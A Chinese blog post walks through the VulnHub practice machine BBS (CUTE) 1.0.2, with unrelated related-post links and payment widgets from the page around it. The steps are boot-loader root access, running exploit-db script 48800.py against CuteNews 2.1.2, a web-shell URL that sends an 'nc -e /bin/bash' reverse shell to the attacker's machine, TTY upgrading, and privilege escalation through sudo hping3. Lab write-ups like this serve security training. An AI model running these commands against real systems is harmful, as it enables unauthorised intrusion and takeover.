BBS (CUTE): 1.0.2

已于 2024-06-15 18:44:31 修改
阅读量267 收藏 2
点赞数 6
文章标签: 网络安全
于 2024-06-15 17:50:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/samtaoys/article/details/139705890
版权

BBS (CUTE): 1.0.2  https://www.vulnhub.com/entry/bbs-cute-102,567/
靶场配置网络
登陆时按e 修改rw signie init=/bin/bash 按Ctrl+x 进入 root@(none) 模式
ip add 看到网卡名字叫做ens33
需要修改网卡配置文件
vi /etc/network/interfaces
allow-hotplug ens33
iface ens33 1inet dhcp
重启获得IP地址

使用目录扫描,获得
http://192.168.204.134/index.php
留意到版本号CuteNews 2.1.2 

在kali上操作
searchsploit cutenews 2.1.2  看到路径
cp /usr/share/exploitdb/exploits/php/webapps/48800.py ./
修改py配置文件,将所有的/CuteNews删除
执行命令python3 48800.py
输入http://192.168.204.134获得账号名密码

登录BBS (CUTE): 1.0.2,找到注入点
http://192.168.204.134/uploads/avatar_vDnS6Pt85h_vDnS6Pt85h.php?cmd=nc%20-e%20/bin/bash%20192.168.204.135%201234

在kali上连接 nc -lvvp 1234 (从KALI输入访问靶机)
python -c 'import pty;pty.spawn("/bin/bash")'
-c : 执行具体的代码
import :导入语句
pty : 终端(接口)
pty.spawn : 执行命令

export TERM=screen

stty rows 45 columns 194 (参考stty -a)
reset

通过sudo -l 查看权限
/usr/sbin/hping3 获得root权限
find / -name /root/root.txt

samtaoys
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
7000个源码批量下载---复制来的
weixin_34353714的博客
09-12 4万+
7000个源码批量下载 7000个源码批量下载 < type="text/javascript" language="JavaScript">document.title="7000个源码批量下载 - "+document.title http://asp.lt263.com/soft/SaGuestBook.rar安全天使字符界面留言本(SaGuestBook)htt...
QQ 腾讯QQ(简称“QQ”)是腾讯公司开发的一款基于Internet的即时通信(IM)软件...
weixin_30469895的博客
07-04 6042
QQ 编辑 腾讯QQ(简称“QQ”)是腾讯公司开发的一款基于Internet的即时通信(IM)软件。腾讯QQ支持在线聊天、视频通话、点对点断点续传文件、共享文件、网络硬盘、自定义面板、QQ邮箱等多种功能,并可与多种通讯终端相连。2015年,QQ继续为用户创造良好的通讯体验!其标志是一只戴着红色围巾的小企鹅。 目前QQ已经覆盖Microsoft Windows、OS X、Androi...
Vulnhub:BBS (CUTE): 1.0.2
分享
04-09 207
Vulnhub:BBS (CUTE): 1.0.2。。。简单的RCE、SUID提权!
VULNHUB之BBS (cute): 1.0.1
鲨鱼辣椒的博客
07-25 387
好久没写文章了,开始是学期末比较忙,后来放假了说实话有点懈怠也比较迷茫。感觉自己要学的东西很多却又不知道该从哪里下手。写文章就暂时放下了,最近整理了一下自己,文章还是要写,仅作为自己慢慢成长路上的一个记录也好。好了,不多说开始今天的练习 信息搜集 扫描网段发现目标主机IP地址 扫描IP地址发现开启的服务以及端口 发现开启的服务寻找漏洞 SSH 看见ssh第一反应就是暴力破解但是也不能盲目,后面有http可以在web页面上看是否能搜集到一些账号相关的敏感信息可以大大加强我们成功爆破的概率(
OSCP靶机练习--CuteNews01
一杯咖啡的渗透记忆
05-19 1644
靶机地址:BBS (cute): 1.0.2 ~ VulnHub 靶机环境搭建: 个人本地环境:VMWare已经安装好了,因为虚拟机镜像是virtualBox的.vbox结尾,所以在本地又安装了VitualBox VMWare和VitualBox的NAT网络不能同时使用, 整了半天也没搞起来,后来才知道这两种虚拟程序不能同时使用NAT。 所以使用了另外一台Kali的机器,直接用主机来测了。靶机本地用VirtualBox安装靶机。 但因为不在同一台机器上面,所以才用的是桥接的方式链接,如下:
7000个源码批量下载
热门推荐
默默的天空
01-29 5万+
7000个源码批量下载 document.title="7000个源码批量下载 - "+document.title http://asp.lt263.com/soft/SaGuestBook.rar 安全天使字符界面留言本(SaGuestBook)http://asp.lt263.com/soft/lbs.rar LBS 0xA5http://asp.lt263.com/soft/
it.sauronsoftware:jave:1.0.2
04-08
免费分享it.sauronsoftware:jave:1.0.2包,一直找不到,找了很久,免费分享给需要的人
视频解析工具:jave-1.0.2.jar.zip
08-14
该资源为音视频解析工具,可解决音视频转码、视频参数解析、视频时间长度、大小等功能问题
jave-1.0.2
02-21
jave-1.0.2.jar用于获取音频文件长度。下载解压导入即可! it.sauronsoftware jave 1.0.2
openssl-libs-1.0.2k-21.el7_9.x86_64.rpm
01-16
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
java-1.0.2
09-14
<dependency> <groupId>it.sauronsoftware</groupId> <artifactId>jave</artifactId> <version>1.0.2</version> </dependency>
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8301
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
1719378276792.jpg
06-26
1719378276792.jpg
054ssm-jsp-mysql旅游景点线路网站.zip(可运行源码+数据库文件+文档)
最新发布
06-26
本系统采用了jsp技术,将所有业务模块采用以浏览器交互的模式,选择MySQL作为系统的数据库,开发工具选择eclipse来进行系统的设计。基本实现了旅游网站应有的主要功能模块,本系统有管理员、和会员,管理员权限如下:个人中心、会员管理、景点分类管理、旅游景点管理、旅游线路管理、系统管理;会员权限如下:个人中心、旅游景点管理、旅游线路管理、我的收藏管理等操作。 对系统进行测试后,改善了程序逻辑和代码。同时确保系统中所有的程序都能正常运行,所有的功能都能操作,并且该系统有很好的操作体验,实现了对于景点和会员双赢。 关键词:旅游网站;jsp;Mysql;
基于单片机的篮球赛计时计分器.doc
06-26
基于单片机的篮球赛计时计分器.doc
基于springboot开发华强北商城二手手机管理系统vue+mysql+论文(毕业设计).zip
06-26
本项目是一个基于SpringBoot开发的华府便利店信息管理系统,使用了Vue和MySQL作为前端框架和数据库。该系统主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的Java学习者,包含项目源码、数据库脚本、项目说明等,有论文参考,可以直接作为毕设使用。 后台框架采用SpringBoot,数据库使用MySQL,开发环境为JDK、IDEA、Tomcat。项目经过严格调试,确保可以运行。如果基础还行,可以在代码基础之上进行改动以实现更多功能。 该系统的功能主要包括商品管理、订单管理、用户管理等模块。在商品管理模块中,可以添加、修改、删除商品信息;在订单管理模块中,可以查看订单详情、处理订单状态;在用户管理模块中,可以注册、登录、修改个人信息等。此外,系统还提供了数据统计功能,可以对销售数据进行统计和分析。 技术实现方面,前端采用Vue框架进行开发,后端使用SpringBoot框架搭建服务端应用。数据库采用MySQL进行数据存储和管理。整个系统通过前后端分离的方式实现,提高了系统的可维护性和可扩展性。同时,系统还采用了一些流行的技术和工具,如MyBatis、JPA等进行数据访问和操作,以及Maven进行项目管理和构建。 总之,本系统是一个基于SpringBoot开发的华府便利店信息管理系统,使用了Vue和MySQL作为前端框架和数据库。系统经过严格调试,确保可以运行。如果基础还行,可以在代码基础之上进行改动以实现更多功能。
wx152微信阅读小程序-ssm+vue+uniapp.zip(可运行源码+sql文件+)
06-26
微信阅读小程序是一个很好的项目,使用了SSM(Spring + Spring MVC + MyBatis)框架 、 前端(Vue.js)和 uniapp 技术。 微信阅读小程序是一个很好的项目,使用了SSM(Spring + Spring MVC + MyBatis)框架 、 前端(Vue.js)和 uniapp 技术。 微信阅读小程序是一个很好的项目,使用了SSM(Spring + Spring MVC + MyBatis)框架 、 前端(Vue.js)和 uniapp 技术。 微信阅读小程序是一个很好的项目,使用了SSM(Spring + Spring MVC + MyBatis)框架 、 前端(Vue.js)和 uniapp 技术。 微信阅读小程序是一个很好的项目,使用了SSM(Spring + Spring MVC + MyBatis)框架 、 前端(Vue.js)和 uniapp 技术。
Cannot resolve com.github.java-hyperspectral:JHyperspectral:1.0.2
06-09
如果在使用Maven导入JHyperspectral库时,遇到了 "Cannot resolve com.github.java-hyperspectral:JHyperspectral:1.0.2" 的错误,可能是因为Maven无法从默认的Maven中央仓库中找到该库。 为了解决这个问题,可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值